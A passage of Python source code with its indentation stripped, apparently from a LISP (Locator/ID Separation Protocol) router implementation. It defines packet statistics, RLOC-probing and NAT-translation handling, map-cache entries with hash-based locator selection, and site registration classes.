#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.rloc_probe_latency = "?/?"
self.recent_rloc_probe_latencies = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
self.multicast_rloc_probe_list = {}
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def store_rloc_probe_latencies(self, json_telemetry):
tel = lisp_decode_telemetry(json_telemetry)
fl = round(float(tel["etr-in"]) - float(tel["itr-out"]), 3)
rl = round(float(tel["itr-in"]) - float(tel["etr-out"]), 3)
last = self.rloc_probe_latency
self.rloc_probe_latency = str(fl) + "/" + str(rl)
last_list = self.recent_rloc_probe_latencies
self.recent_rloc_probe_latencies = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_latency(self):
return(self.rloc_probe_latency)
#enddef
def print_recent_rloc_probe_latencies(self):
latencies = str(self.recent_rloc_probe_latencies)
return(latencies)
#enddef
def process_rloc_probe_reply(self, ts, nonce, eid, group, hc, ttl, jt):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
#
# Compute RTTs.
#
rloc.last_rloc_probe_reply = ts
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
#
# Store hops.
#
rloc.store_rloc_probe_hops(hc, ttl)
#
# Store one-way latency if telemetry data json in Map-Reply.
#
if (jt): rloc.store_rloc_probe_latencies(jt)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
lat = bold(rloc.print_rloc_probe_latency(), False)
lat = ", latency {}".format(lat) if jt else ""
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.register_ttl = LISP_REGISTER_TTL
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
# Take uptime modulo TTL and if the value is greater than 10% of
# TTL, refresh entry. So that is around every 13 or 14 seconds.
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
